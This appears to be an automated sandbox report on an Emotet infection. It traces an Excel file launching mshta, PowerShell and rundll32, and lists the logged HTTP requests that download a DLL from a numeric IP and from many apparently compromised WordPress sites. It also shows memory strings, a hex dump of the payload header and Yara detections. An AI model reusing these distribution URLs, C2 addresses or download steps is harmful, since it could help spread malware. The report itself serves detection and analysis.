Source: Malware configuration extractor	IPs: 59.148.253.194:443

Source: global traffic	HTTP traffic detected: GET /qqw/aas/se.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/XSs5/ HTTP/1.1Host: kuyporn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-admin/vzOG/ HTTP/1.1Host: jeffreylubin.igclout.comConnection: Keep-Alive

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-msdownloadContent-Length: 557056Connection: keep-aliveKeep-Alive: timeout=15Date: Fri, 28 Jan 2022 20:24:48 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Fri, 28 Jan 2022 20:24:48 GMTContent-Disposition: attachment; filename="NsLUiuT.dll"Content-Transfer-Encoding: binarySet-Cookie: 61f451108e964=1643401488; expires=Fri, 28-Jan-2022 20:25:48 GMT; Max-Age=60; path=/Last-Modified: Fri, 28 Jan 2022 20:24:48 GMTX-Frame-Options: SAMEORIGINData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 20 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 10 00 00 5d f5 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 76 02 00 00 a0 05 00 00 80 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 76 93 00 00 00 20 08 00 00 a0 00 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@

Source: global traffic

HTTP traffic detected: GET /qqw/aas/se.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: Joe Sandbox View	IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View	IP Address: 104.131.62.48 104.131.62.48

Source: unknown

Network traffic detected: IP country count 15

Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.168
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.168/qqw/aas/se
Source: mshta.exe, 00000004.00000002.436735526.00000000003C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414890461.0000000003572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.168/qqw/aas/se.html
Source: mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlA(
Source: 80_513972285.xls.0.dr	String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlB
Source: mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlC:
Source: mshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlEtrM
Source: mshta.exe, 00000004.00000003.415189643.00000000002FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlMuzL
Source: mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlO(
Source: mshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlWinSta0
Source: mshta.exe, 00000004.00000002.434904863.00000000002EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432627473.00000000002E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlXtrP
Source: mshta.exe, 00000004.00000003.418218977.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlfunction
Source: mshta.exe, 00000004.00000003.416857633.0000000002B95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.html
Source: mshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlmshta
Source: mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlv1.0
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.168/qqw/aas/se.png
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.168/qqw/aas/se.pngPE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs-construction.com/wp-
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs-construction.com/wp-admin/JJEf0kEA5/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs-construction.com/wp-admin/JJEf0kEA5/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://flybustravel.com/cgi-bin/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://flybustravel.com/cgi-bin/2TjUH/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://flybustravel.com/cgi-bin/2TjUH/PE3
Source: powershell.exe, 00000006.00000002.677511514.00000000039CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jeffreylubin.igclout.com
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jeffreylubin.igclout.com/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jeffreylubin.igclout.com/wp-admin/vzOG/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://kuyporn.c
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://kuyporn.com
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://kuyporn.com/wp-content/XS
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://kuyporn.com/wp-content/XSs5/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://kuyporn.com/wp-content/XSs5/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://wallacebradley.com/css/Yc
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://wallacebradley.com/css/YcDc927SJR/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://wallacebradley.com/css/YcDc927SJR/PE3
Source: powershell.exe, 00000006.00000002.670395063.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000006.00000002.670395063.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mshta.exe, 00000004.00000003.432498297.0000000003536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437126353.00000000035CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.protware.com
Source: mshta.exe, 00000004.00000003.432412944.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415021403.00000000035C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431896244.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431603651.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431688138.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437362266.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437239734.000000000409B000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437126353.00000000035CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.protware.com/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://algzor.c
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://algzor.com/wp-includes/g
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://algzor.com/wp-includes/ghFXVrGLEh/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://algzor.com/wp-includes/ghFXVrGLEh/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bluwom-milano.com/wp-con
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bluwom-milano.com/wp-content/FEj3y4z/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bluwom-milano.com/wp-content/FEj3y4z/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://elroieyecentre.org/cgi-b
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://esaci-egypt.com/wp-inclu
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://esaci-egypt.com/wp-includes/W7qXVeGp/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://grupomartinsanchez.com/w
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pcovestudio.com/wp-admin
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://thaireportchannel.com/wp
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/PE3
Source: powershell.exe, 00000006.00000002.677511514.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htm

Jump to behavior

Source: unknown

DNS traffic detected: queries for: kuyporn.com

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv,

Source: global traffic	HTTP traffic detected: GET /qqw/aas/se.html HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qqw/aas/se.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/XSs5/ HTTP/1.1Host: kuyporn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-admin/vzOG/ HTTP/1.1Host: jeffreylubin.igclout.comConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168

Source: mshta.exe, 00000004.00000002.434924168.00000000002FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415189643.00000000002FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000002.434924168.00000000002FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415189643.00000000002FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,

Source: C:\Windows\System32\mshta.exe

Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud

Yara detected Emotet

Source: Yara match	File source: 17.2.rundll32.exe.330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.28f0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2890000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2810000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2280000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3060000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2340000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2130000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2860000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.3e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2280000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2170000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.460000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2100000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2830000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.330000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2e10000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.27a0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.3150000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.610000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.23f0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2e00000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2080000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2130000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.28a0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.440000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.26d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.6c0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.31c0000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.330000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.26b0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.630000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2840000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.3190000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2870000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.430000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.28c0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2160000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.4f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2740000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.460000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.27a0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2730000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.4f0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2860000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2340000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.26d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2950000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.470000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2890000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2810000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3030000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.23c0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.4f0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2dc0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.4f0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.28f0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2950000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2740000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.23f0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3030000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.4c0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.3160000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2e10000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.660000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2870000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2080000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2490000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.630000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2730000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2ed0000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.27c0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2e00000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.3190000.14.raw.unpack, type: UNPACKEDPE
